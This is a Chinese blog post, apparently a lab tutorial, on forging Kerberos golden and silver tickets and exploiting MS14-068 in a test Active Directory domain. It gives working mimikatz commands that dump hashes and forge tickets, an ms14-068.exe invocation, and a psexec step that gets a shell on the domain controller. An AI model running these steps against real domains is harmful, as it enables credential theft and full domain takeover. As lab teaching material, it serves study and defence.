黄金白银票据的伪造以及ms14-068的使用(域渗透)

最新推荐文章于 2024-06-06 19:20:27 发布
最新推荐文章于 2024-06-06 19:20:27 发布
阅读量3.4k 收藏 4
点赞数 1
文章标签: 安全 服务器 http
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45612728/article/details/122797663
版权

以下实验使用到的软件有mimikatz和psexec软件.使用的到的pc有一台win7的计算机和一台域控的08服务器.注意:win7的计算机以普通的域用户添加到cyh.com域环境中.08服务器的ip地址为:192.168.0.222,dns:192.168.0.222,网关:192.168.0.2

1. 黄金票据的伪造

黄金票据其实就是伪造tgt的,关于什么是tgt请看我之前的博客,tgt也有人称是通票.
实验步骤:
1.1前提 需要域的sid和tgt的hahs值
1.2 获取域控的的hash值,需要在域控08服务器中获取
并且导出到当前目录的1.txt文件中

mimikatz.exe "privilege::debug" "lsadump::lsa /patch" exit > 1.txt

在这里插入图片描述
我们需要的东西就是ntlm值
在这里插入图片描述
1.3 获取域的sid值,可以直接在win7cmd命令行中输入whoami /all即可查看.
sid后面的1106是用户的id,是不需要用到的
在这里插入图片描述
1.4 删除本身存在的票据和尝试访问域控的c盘是否可以查看到文件夹,因为删除了相关的票据是访问不到域控的c盘,所以才有下文需要伪造黄金票据.
klist 是查看票据
klist purge 是删除所有的票据
net time 是查看域控的名称
dir \WIN-9JJK4CNGD41.cyh.com\c$ 是用查看域控服务器的的c盘
在这里插入图片描述
在这里插入图片描述
1.5 伪造黄金票据
从上面的过程中,我们收集到了sid和hash值,我们就可以伪造黄金票据了.
这里解析一下下面的语句是什么意思,user就是你需要的伪造用户,domain就是域控的域名,sid就是域的sid,krbtgt就是域控的hash值

mimikatz.exe "kerberos::golden /user:test /domain:cyh.com /sid:S-1-5-21-2511895695-3322341454-56546430 /krbtgt:f0a958f7f25b6cd174cab27936f11cb9 /ptt" exit

在这里插入图片描述
1.6 查看票据是否伪造成功,是否可以查看域控的c盘文件.
使用klist来查看是否伪造成功票据
然后dir c盘
在这里插入图片描述
在这里插入图片描述
1.7 获取域控的cmd命令
使用psexec软件可以实现获取域控的cmd
注意:192.168.0.222 是域控的ip地址 or 0.207是普通域用户的ip地址

psexec.exe \\WIN-9JJK4CNGD41 cmd.exe

在这里插入图片描述
在这里插入图片描述

2.白银票据的伪造

白银票据也称为专票,就是指定去访问某一个服务的.
需要域的sid 域控的hash dc的ip地址
2.1 获取 \WIN-9JJK4CNGD41 的hash值,也是在域控08机器上面获取.
c55118b9b45da492715bcdbb5406c7a6就是域控hash的值

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit > 2.txt

在这里插入图片描述
2.2 删除域的票据等操作
在这里插入图片描述
2.3 制作白银票据
user是用户,domain是域的域名,sid是域的sid和黄金票据的是一样的,target是域地址,service是指定需要访问的服务,rc4是hash值.

mimikatz.exe "kerberos::golden /user:test /domain:cyh.com /sid:S-1-5-21-2511895695-3322341454-56546430  /target:WIN-9JJK4CNGD41.cyh.com /service:cifs /rc4:c55118b9b45da492715bcdbb5406c7a6 /ptt" exit

在这里插入图片描述

2.4 查看票据和查看域控的c盘
在这里插入图片描述

3.ms14-068的利用,直接获取域控的身份

前面的黄金和白银票据都是需要获取域的hash值,但是ms14-068是不需要hash的值,只需要或者普通域用户的账号和密码即可.还有对用的用户sid值,但是有一个前提就是补丁没有打才可以使用.
3.1 清空票据
在这里插入图片描述
3.2 使用ms14-068.exe制作证书.
test@cyh.com 是域的用户,-p是普通域用户的密码,-s是用户的sid,而不是域的sid了,-d是域的地址

ms14-068.exe -u test@cyh.com -p 123.com -s S-1-5-21-2511895695-3322341454-56546430-1106 -d WIN-9JJK4CNGD41.cyh.com

在这里插入图片描述
后缀ccache就是我们获取的证书
在这里插入图片描述

3.3 使用mimikztz导入证书

mimikatz.exe "kerberos::ptc TGT_xy@cc.com.ccache" exit

在这里插入图片描述
3.4 查看票据
在这里插入图片描述
在这里插入图片描述
3.5 使用psexec来连接域控的cmd
在这里插入图片描述

请再坚持一下
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
渗透 | 白银票据利用
无心的博客
10-30 2963
目录 0x01 介绍 0x02 白银票据利用 0x01 介绍 之前,我们已经详细说过Kerberos认证的流程,这次我们就来说说如何对其进行利用,这次主要说的是白银票据伪造(Silver Tickets) 白银票据伪造利用的是Kerberos认证中的第三个步骤,在第三步的时候,client会带着ticket向server的某个服务进行请求,如果验证通过就可以访问server上的指定服务了,这里...
伪造黄金票据实验
Tranquillity
09-17 607
0x01 实验准备 实验工具: PsExec64工具是内网渗透中的免杀渗透利器。 mimikatz_trunk工具的功能是直接从 lsass.exe 进程里获取windows处于active状态账号的明文密码,还可以提升进程权限、注入进程、读取进程内存等等。 实验环境: Windows server 2008 作为控制器,为 yuming.com Windows 7 作为 yuming下的一台设备 0x02 黄金票据条件 名称[AD PowerShell模块:(Get-ADDoma
黄金票据白银票据ms14-068
最新发布
mashiro_hibiki的博客
06-06 579
安全技术水平的催化者,星球针对成员的技术问题,快速提供思考方向及解决方案,并为星友提供多种方向的学习资料、安全工具、POC&EXP以及各种学习笔记等,以引导者和催化剂的方式助力安全技术水平的提升。黄金票据的漏洞原理是伪造krbtgt用户的票据,krbtgt用户是控中用来管理发放票据的用户,拥有了该用户的权限,就可以伪造系统中的任意用户。我们是一个快速成长的team,团队的发展方向与每一位星友的学习方向密切相关,加入我们,一起成为更好的自己!ms14068的漏洞原理是伪造管的tgt。
黄金白银票据伪造
gental_z的博客
01-04 2476
黄金白银票据伪造 内协议Kerberos ​ 在环境中,一般使用Kerberos来作为身份认证的一种协议。其实NTLM协议也存在于环境中。两种协议共存,针对不同的协议,也就有了不同的攻击方式。 传统的Kerberos认证模型 ​ 首先来介绍一下Kerberos认证的模型: ​ 在Kerberos认证环境下,主要存在三种角色,分别为客户端、服务端以及KDC即密钥分发中心。在环境中,KDC存在于DC上面。客户端想要访问服务端上的某些服务,首先需要向KDC申请一张TGT票据,然后使用票据去申请访问目标
伪造TGT黄金票据
深蓝旭的博客
02-07 768
通过上一篇文章我们初步了解了Kerberos协议的工作过程,解决的两个问题 第一个问题:如何证明你本人是XXX用户的问题 由Authentication Server负责第二个问题:提供服务的服务器如何知道你有权限访问它提供的服务。当一个Client去访问Server服务器上的某服务时,Server如何判断Client是否有权限来访问自己主机上的服务。 由Ticket Granting Server负责针对Kerberos协议需要解决的第一个问题:如何证明你本人是XXX用户的问题。攻击者提出了...
内网渗透--CS伪造黄金票据白银票据
Armandhe的博客
06-24 3441
性感作者,在线翻车
查询白银价格 黄金白银价钱走势查询 v1.0
10-21
较新黄金价格走势,较新白银价格走势,黄金走势,纸黄金实时价格。
渗透中的DPAPI和Kerberos协议.pdf
08-08
议题分享主要介绍了渗透中数据保护API架构逻辑和Kerberos认证协议的通信流程,同时从攻击者的角度谈了DPAPI和Kerberos协议的利用,最后给出常见攻击思路的防御和缓解措施。 1.1 DPAPI架构 1.2 DPAPI加密机制 1.3 ...
黄金白银策略月报-20190930-中银国际期货-16页.pdf
09-03
黄金白银策略月报-20190930-中银国际期货-16页.pdf
投资白银黄金的优势-黄金模板.pptx
09-21
投资白银黄金的优势-黄金模板.pptx
深石油黄金白银分析 银天下深石油行情分析软件 v4.3.0
10-23
银天下深石油行情分析软件专注于石油交易,实时更新经济数据,权威专业易操作。投资者可获取整合的资讯信息,专家解盘,实时交易行情。银天下石油深石油行情分析系统是一
伪造白银票据实验
Tranquillity
09-13 586
0x01 实验准备 实验工具: PsExec64工具是内网渗透中的免杀渗透利器。 mimikatz_trunk 工具的功能是直接从 lsass.exe 进程里获取windows处于active状态账号的明文密码,还可以提升进程权限、注入进程、读取进程内存等等。 实验环境: Windows server 2008 作为控制器,为 yuming.com Windows 7 作为 yuming下的一台设备 0x02 白银票据条件 名称 的SID值 的服务账号的密码HASH 伪造的用户
黄金票据攻击
Aquariusqsmy的博客
04-02 933
通过这种方法,攻击者可以生成有效的TGT Kerberos票据,且这些票据不受TGT生命周期的影响(TGT默认生命周期为10小时,最多可续订7天)。在Windows系统中,攻击者还可以利用已获得的权限或漏洞进行票据提权,进一步提升自己的权限并获取黄金票据。具体来说,黄金票据攻击可以为任意用户生成TGT票据,这意味着攻击者甚至可以为管理员生成TGT,从而使普通用户获得管理员的权限。:SID(安全标识符)是唯一的,用于标识Windows操作系统中的安全主体(如用户账户、组账户等)。
内网渗透-(黄金票据白银票据)详解(一)
duoba_an的博客
03-31 1348
在 Kerberos 认证中,最主要的问题是如何证明「你是你」的问题,如当一个 Client 去访问 Server 服务器上的某服务时,Server 如何判断 Client 是否有权限来访问自己主机上的服务,同时保证在这个过程中的通讯内容即使被拦截或篡改也不影响通讯的安全性,这正是 Kerberos 解决的问题。获取Client的sid,以及所在的组,再根据该服务的ACL,判断Client是否有访问服务的权限,到此完成整个认证流程(大多数服务并没有验证PAC这一步)。这个是启用PAC支持的扩展。
复现MS14-068
这里是Y.lin的博客,目前是一名网络安全专业的学生,希望和师傅们一起进步吧!
05-23 556
MS14-068
内网渗透:三、Kerberos协议及票据黄金白银伪造
liu_jia_liang的博客
02-20 3477
一、Kerberos协议 kerberos(Secure network authentication system)中文叫网络安全认证系统 kerberos在进行认证过程中并不会传输用户的密码,而是通过传输tickets(票据)进行认证登陆到LDAP server。Kerberos协议主要用于计算机网络的身份鉴别,其特点是用户只需输入一次身份验证信息就可以凭借此验证获得的凭证(ticket-granting-ticket)访问多个服务,即SSO(Single Sign On)。由于在每个Client和S
权限维持-黄金/白银票据详解
good good study
04-19 2024
环境中进行权限维持,谈的比较多的便是票据,分为白银票据黄金票据, 其原理都是基于Kerberos认证。黄金票据伪造的是管下发给用户的TGT,而白银票据则是伪造的 ST。
AD渗透 | MS14068漏洞原理及复现
m0_57221101的博客
04-18 2574
漏洞编号MS14-068的漏洞,将允许任意用户提升到管理员的权限,补丁编号则是KB3011780 原理分析 ​ 在之前提到白银票据攻击的时候,我们仿佛默认了一个用户可以访问任何的服务。但事实上,往往我们需要控制一些账户使他们不能访问一些服务。这时微软引入了PAC的概念,PAC包含了用户的ID,组ID一类的认证信息。进一步的PAC的分析,请期待我之后会发布的Kerberos协议的抓包分析。如果现在就想要进一步了解请看文末的链接,将导向daiker大佬的文章 ​ 在这里PAC权限验证机制产生漏洞的原因是
黄金票据复现
plutochen05的博客
04-03 929
黄金票据攻击是网络安全中一种重要的渗透攻击手段。它利用Kerberos身份认证协议中的漏洞,允许攻击者伪造控krbtgt用户的TGT(Ticket-Granting Ticket)。一旦攻击者成功伪造了TGT,他们就可以访问网络中的任何资源,而无需知道任何有效用户的账户凭据。这种攻击方式可以让攻击者在中提升权限,甚至取得管理员权限。黄金票据攻击的前提是攻击者需要获得管理员访问控制器的权限,并抓取到krbtgt hash。
内网渗透黄金票据白银票据的区别
03-31
黄金票据白银票据是内网渗透中常见的两种攻击手段,它们的主要区别在于: 1. 黄金票据通常是使用被攻破的控制器的管理员账户来获取的,因此具有更高的权限,可以访问中的所有资源和计算机。而白银票据则是使用已经被攻破的计算机的本地管理员账户来获取的,权限相对较低。 2. 黄金票据通常是用于攻击活动目录服务(Active Directory)中的控制器,因为它可以让攻击者在控制器上执行任意操作,包括创建新的账户、修改密码、添加权限等。而白银票据则更适用于攻击普通的计算机,可以帮助攻击者获取更高的权限。 综上所述,黄金票据白银票据在内网渗透中各具特点,攻击者需要根据具体情况选择使用哪种票据来进行攻击。同时,企业也应该采取相应的防御措施,如加强控制器的安全性、限制管理员权限等,以避免遭受此类攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值